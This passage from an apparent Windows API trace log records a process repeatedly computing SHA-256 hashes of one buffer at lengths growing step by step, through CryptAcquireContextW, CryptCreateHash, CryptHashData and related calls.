phProv=0xce140*=0x338225d0) returned 1 [0189.548] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.548] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x400, dwFlags=0x0) returned 1 [0189.548] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.548] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd170 [0189.548] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32acd170, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd170, pdwDataLen=0xce12c) returned 1 [0189.548] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.548] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.548] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338236d0) returned 1 [0189.551] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.551] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x420, dwFlags=0x0) returned 1 [0189.551] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.551] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accfc0 [0189.551] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32accfc0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accfc0, pdwDataLen=0xce12c) returned 1 [0189.551] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.551] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0189.551] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.551] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.551] CryptHashData (hHash=0x3396ee80, pbData=0x32348160, dwDataLen=0x440, dwFlags=0x0) returned 1 [0189.551] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.551] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accf30 [0189.551] CryptGetHashParam (in: hHash=0x3396ee80, dwParam=0x2, pbData=0x32accf30, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accf30, pdwDataLen=0xce12c) returned 1 [0189.551] CryptDestroyHash (hHash=0x3396ee80) returned 1 [0189.551] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.551] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.552] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.552] CryptHashData (hHash=0x3396f580, pbData=0x32348160, dwDataLen=0x460, dwFlags=0x0) returned 1 [0189.552] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.552] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd500 [0189.552] CryptGetHashParam (in: hHash=0x3396f580, dwParam=0x2, pbData=0x32acd500, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd500, pdwDataLen=0xce12c) returned 1 [0189.552] CryptDestroyHash (hHash=0x3396f580) returned 1 [0189.552] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.552] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822cd0) returned 1 [0189.553] CryptCreateHash (in: hProv=0x33822cd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.553] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x480, dwFlags=0x0) returned 1 [0189.553] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.553] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accf60 [0189.553] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32accf60, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accf60, pdwDataLen=0xce12c) returned 1 [0189.553] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.553] CryptReleaseContext (hProv=0x33822cd0, dwFlags=0x0) returned 1 [0189.553] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.554] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.554] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x4a0, dwFlags=0x0) returned 1 [0189.554] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.554] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd230 [0189.554] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32acd230, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd230, pdwDataLen=0xce12c) returned 1 [0189.554] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0189.554] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.554] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.554] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.554] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x4c0, dwFlags=0x0) returned 1 [0189.554] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.554] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd0e0 [0189.554] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32acd0e0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd0e0, pdwDataLen=0xce12c) returned 1 [0189.554] CryptDestroyHash (hHash=0x3396ec50) returned 1 [0189.554] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.554] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.557] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.557] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x4e0, dwFlags=0x0) returned 1 [0189.557] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.557] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd1d0 [0189.557] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acd1d0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd1d0, pdwDataLen=0xce12c) returned 1 [0189.557] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.557] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.557] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338236d0) returned 1 [0189.557] CryptCreateHash (in: hProv=0x338236d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.557] CryptHashData (hHash=0x3396eb00, pbData=0x32348160, dwDataLen=0x500, dwFlags=0x0) returned 1 [0189.557] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.557] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acce40 [0189.557] CryptGetHashParam (in: hHash=0x3396eb00, dwParam=0x2, pbData=0x32acce40, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acce40, pdwDataLen=0xce12c) returned 1 [0189.557] CryptDestroyHash (hHash=0x3396eb00) returned 1 [0189.558] CryptReleaseContext (hProv=0x338236d0, dwFlags=0x0) returned 1 [0189.558] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821dd0) returned 1 [0189.558] CryptCreateHash (in: hProv=0x33821dd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.558] CryptHashData (hHash=0x3396ef60, pbData=0x32348160, dwDataLen=0x520, dwFlags=0x0) returned 1 [0189.558] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.558] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd410 [0189.558] CryptGetHashParam (in: hHash=0x3396ef60, dwParam=0x2, pbData=0x32acd410, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd410, pdwDataLen=0xce12c) returned 1 [0189.558] CryptDestroyHash (hHash=0x3396ef60) returned 1 [0189.558] CryptReleaseContext (hProv=0x33821dd0, dwFlags=0x0) returned 1 [0189.558] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.559] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.559] CryptHashData (hHash=0x3396ed30, pbData=0x32348160, dwDataLen=0x540, dwFlags=0x0) returned 1 [0189.559] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.559] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd530 [0189.559] CryptGetHashParam (in: hHash=0x3396ed30, dwParam=0x2, pbData=0x32acd530, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd530, pdwDataLen=0xce12c) returned 1 [0189.559] CryptDestroyHash (hHash=0x3396ed30) returned 1 [0189.559] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.559] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.559] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.559] CryptHashData (hHash=0x3396eb70, pbData=0x32348160, dwDataLen=0x560, dwFlags=0x0) returned 1 [0189.559] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acced0 [0189.560] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32acced0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acced0, pdwDataLen=0xce12c) returned 1 [0189.560] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0189.560] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.560] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.560] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.560] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x580, dwFlags=0x0) returned 1 [0189.560] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.560] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd200 [0189.560] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32acd200, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd200, pdwDataLen=0xce12c) returned 1 [0189.560] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.560] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.560] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.561] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.561] CryptHashData (hHash=0x3396ea20, pbData=0x32348160, dwDataLen=0x5a0, dwFlags=0x0) returned 1 [0189.561] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.561] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accc30 [0189.561] CryptGetHashParam (in: hHash=0x3396ea20, dwParam=0x2, pbData=0x32accc30, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accc30, pdwDataLen=0xce12c) returned 1 [0189.561] CryptDestroyHash (hHash=0x3396ea20) returned 1 [0189.561] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.561] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338223d0) returned 1 [0189.562] CryptCreateHash (in: hProv=0x338223d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.562] CryptHashData (hHash=0x3396f190, pbData=0x32348160, dwDataLen=0x5c0, dwFlags=0x0) returned 1 [0189.562] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.562] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd590 [0189.562] CryptGetHashParam (in: hHash=0x3396f190, dwParam=0x2, pbData=0x32acd590, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd590, pdwDataLen=0xce12c) returned 1 [0189.562] CryptDestroyHash (hHash=0x3396f190) returned 1 [0189.562] CryptReleaseContext (hProv=0x338223d0, dwFlags=0x0) returned 1 [0189.562] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338221d0) returned 1 [0189.562] CryptCreateHash (in: hProv=0x338221d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.562] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x5e0, dwFlags=0x0) returned 1 [0189.562] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd2f0 [0189.563] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32acd2f0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd2f0, pdwDataLen=0xce12c) returned 1 [0189.563] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.563] CryptReleaseContext (hProv=0x338221d0, dwFlags=0x0) returned 1 [0189.563] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822ad0) returned 1 [0189.563] CryptCreateHash (in: hProv=0x33822ad0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.563] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x600, dwFlags=0x0) returned 1 [0189.563] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.563] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd1a0 [0189.563] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acd1a0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd1a0, pdwDataLen=0xce12c) returned 1 [0189.563] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.563] CryptReleaseContext (hProv=0x33822ad0, dwFlags=0x0) returned 1 [0189.563] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.564] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.564] CryptHashData (hHash=0x3396f890, pbData=0x32348160, dwDataLen=0x620, dwFlags=0x0) returned 1 [0189.564] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.564] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd080 [0189.564] CryptGetHashParam (in: hHash=0x3396f890, dwParam=0x2, pbData=0x32acd080, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd080, pdwDataLen=0xce12c) returned 1 [0189.564] CryptDestroyHash (hHash=0x3396f890) returned 1 [0189.564] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.564] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338233d0) returned 1 [0189.567] CryptCreateHash (in: hProv=0x338233d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.567] CryptHashData (hHash=0x3396eb70, pbData=0x32348160, dwDataLen=0x640, dwFlags=0x0) returned 1 [0189.567] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd620 [0189.567] CryptGetHashParam (in: hHash=0x3396eb70, dwParam=0x2, pbData=0x32acd620, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd620, pdwDataLen=0xce12c) returned 1 [0189.567] CryptDestroyHash (hHash=0x3396eb70) returned 1 [0189.567] CryptReleaseContext (hProv=0x338233d0, dwFlags=0x0) returned 1 [0189.567] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338222d0) returned 1 [0189.567] CryptCreateHash (in: hProv=0x338222d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.567] CryptHashData (hHash=0x3396f660, pbData=0x32348160, dwDataLen=0x660, dwFlags=0x0) returned 1 [0189.567] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.567] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accea0 [0189.567] CryptGetHashParam (in: hHash=0x3396f660, dwParam=0x2, pbData=0x32accea0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accea0, pdwDataLen=0xce12c) returned 1 [0189.568] CryptDestroyHash (hHash=0x3396f660) returned 1 [0189.568] CryptReleaseContext (hProv=0x338222d0, dwFlags=0x0) returned 1 [0189.568] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338238d0) returned 1 [0189.568] CryptCreateHash (in: hProv=0x338238d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.568] CryptHashData (hHash=0x3396f6d0, pbData=0x32348160, dwDataLen=0x680, dwFlags=0x0) returned 1 [0189.568] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.568] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd2c0 [0189.568] CryptGetHashParam (in: hHash=0x3396f6d0, dwParam=0x2, pbData=0x32acd2c0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd2c0, pdwDataLen=0xce12c) returned 1 [0189.568] CryptDestroyHash (hHash=0x3396f6d0) returned 1 [0189.568] CryptReleaseContext (hProv=0x338238d0, dwFlags=0x0) returned 1 [0189.568] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338225d0) returned 1 [0189.569] CryptCreateHash (in: hProv=0x338225d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.569] CryptHashData (hHash=0x3396eef0, pbData=0x32348160, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0189.569] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.569] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd0b0 [0189.569] CryptGetHashParam (in: hHash=0x3396eef0, dwParam=0x2, pbData=0x32acd0b0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd0b0, pdwDataLen=0xce12c) returned 1 [0189.569] CryptDestroyHash (hHash=0x3396eef0) returned 1 [0189.569] CryptReleaseContext (hProv=0x338225d0, dwFlags=0x0) returned 1 [0189.569] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338239d0) returned 1 [0189.569] CryptCreateHash (in: hProv=0x338239d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.570] CryptHashData (hHash=0x3396f430, pbData=0x32348160, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0189.570] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.570] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd140 [0189.570] CryptGetHashParam (in: hHash=0x3396f430, dwParam=0x2, pbData=0x32acd140, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd140, pdwDataLen=0xce12c) returned 1 [0189.570] CryptDestroyHash (hHash=0x3396f430) returned 1 [0189.570] CryptReleaseContext (hProv=0x338239d0, dwFlags=0x0) returned 1 [0189.570] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33821fd0) returned 1 [0189.570] CryptCreateHash (in: hProv=0x33821fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.570] CryptHashData (hHash=0x3396ee10, pbData=0x32348160, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0189.570] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.571] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accd50 [0189.571] CryptGetHashParam (in: hHash=0x3396ee10, dwParam=0x2, pbData=0x32accd50, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accd50, pdwDataLen=0xce12c) returned 1 [0189.571] CryptDestroyHash (hHash=0x3396ee10) returned 1 [0189.571] CryptReleaseContext (hProv=0x33821fd0, dwFlags=0x0) returned 1 [0189.571] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x33822fd0) returned 1 [0189.571] CryptCreateHash (in: hProv=0x33822fd0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.571] CryptHashData (hHash=0x3396f0b0, pbData=0x32348160, dwDataLen=0x700, dwFlags=0x0) returned 1 [0189.571] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.571] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32acd3b0 [0189.571] CryptGetHashParam (in: hHash=0x3396f0b0, dwParam=0x2, pbData=0x32acd3b0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32acd3b0, pdwDataLen=0xce12c) returned 1 [0189.571] CryptDestroyHash (hHash=0x3396f0b0) returned 1 [0189.571] CryptReleaseContext (hProv=0x33822fd0, dwFlags=0x0) returned 1 [0189.571] CryptAcquireContextW (in: phProv=0xce140, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xce140*=0x338227d0) returned 1 [0189.572] CryptCreateHash (in: hProv=0x338227d0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xce130 | out: phHash=0xce130) returned 1 [0189.572] CryptHashData (hHash=0x3396ec50, pbData=0x32348160, dwDataLen=0x720, dwFlags=0x0) returned 1 [0189.572] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x4, pbData=0xce12c, pdwDataLen=0xce13c, dwFlags=0x0 | out: pbData=0xce12c, pdwDataLen=0xce13c) returned 1 [0189.572] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32accdb0 [0189.572] CryptGetHashParam (in: hHash=0x3396ec50, dwParam=0x2, pbData=0x32accdb0, pdwDataLen=0xce12c, dwFlags=0x0 | out: pbData=0x32accdb0, pdwDataLen=0xce12c) returned 1 [0189.572] CryptDestroyHash (hHash=0x3396ec50) returned 1 